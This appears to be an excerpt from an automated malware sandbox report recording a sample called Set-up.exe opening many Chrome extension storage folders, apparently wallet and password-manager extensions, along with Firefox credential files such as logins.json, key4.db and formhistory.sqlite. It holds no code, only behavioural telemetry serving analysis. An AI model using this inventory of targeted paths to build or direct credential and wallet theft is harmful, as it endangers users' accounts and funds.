Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles\Local State Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcbigmjiafegjnnogedioegffbooigli Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles\Local State Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kfdniefadaanbjodldohaedphafoffoh Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ckdjpkejmlgmanmmdfeimelghmdfeobe Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibegklajigjlbljkhfpenpfoadebkokl Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onapnnfmpjmbmdcipllnjmjdjfonfjdm Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\iokeahhehimjnekafflcihljlcjccdbe Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmmkllgcgpldbblpnhghdojehhfafhro Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdpelninpfbopdfbppfopcmoepikkgk Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cfdldlejlcgbgollnbonjgladpgeogab Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\enabgbdfcbaehmbigakijjabdpdnimlg Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ekkhlihjnlmjenikbgmhgjkknoelfped Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilbibkgkmlkhgnpgflcjdfefbkpehoom Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odpnjmimokcmjgojhnhfcnalnegdjmdn Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ldinpeekobnhjjdofggfgjlcehhmanlj Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\apbldaphppcdfbdnnogdikheafliigcf Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnefghmjgbmpkjjfhefnenfnejdjneog Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nebnhfamliijlghikdgcigoebonmoibm Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkhmbjifakpikpapdiaepgkdephjgnma Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ablbagjepecncofimgjmdpnhnfjiecfm Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnmbobjmhlngoefaiojfljckilhhlhcj Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ogphgbfmhodmnmpnaadpbdadldbnmjji Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fpcamiejgfmmhnhbcafmnefbijblinff Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gjhohodkpobnogbepojmopnaninookhj Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egdddjbjlcjckiejbbaneobkpgnmpknp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nofkfblpeailgignhkbnapbephdnmbmn Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bopcbmipnjdcdfflfgjdgdjejmgpoaab Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klghhnkeealcohjjanjjdaeeggmfmlpl Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nihlebdlccjjdejgocpogfpheakkpodb Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jngbikilcgcnfdbmnmnmnleeomffciml Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lnnnmfcpbkafcpgdilckhmhbkkbpkmid Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hjagdglgahihloifacmhaigjnkobnnih Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jfdlamikmbghhapbgfoogdffldioobgl Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lfochlioelphaglamdcakfjemolpichk Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdgbckgdncnhihllonhnjbdoighgpimk Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bifidjkcdpgfnlbcjpdkdcnbiooooblg Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijpdbdidkomoophdnnnfoancpbbmpfcn Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key3.db Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\iodngkohgeogpicpibpnaofoeifknfdo Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpmkedoipcpimgecpmgpldfpohjplkpp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmglflngjlhgibbmcedpdabjmcmboamo Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ljfpcifpgbbchoddpjefaipoiigpdmag Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ldpmmllpgnfdjkmhcficcifgoeopnodc Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafch Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Local State Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kglcipoddmbniebnibibkghfijekllbl Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mjdmgoiobnbombmnbbdllfncjcmopfnc Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cfhdojbkjhnklbpkdaibdccddilifddb Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\omaabbefbmiijedngplfjmnooppbclkk Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\djclckkglechooblngghdinmeemkbgci Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\njojblnpemjkgkchnpbfllpofaphbokk
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Mozilla\Firefox\Profiles\Local State
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mbcafoimmibpjgdjboacfhkijdkmjocd
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmphdnilpmdejikjdnlbcnmnabepfgkh
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmnded
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmjmllblpcbmniokccdoaiahcdajdjof
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hhmkpbimapjpajpicehcnmhdgagpfmjc
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmhjnpmdlhokfidldlglfhkkfhjdmhgl
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fldfpgipfncgndfolcbkdeeknbbbnhcc
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fiikommddbeccaoicoejoniammnalkfa
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oiaanamcepbccmdfckijjolhlkfocbgj
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flhbololhdbnkpnnocoifnopcapiekdi
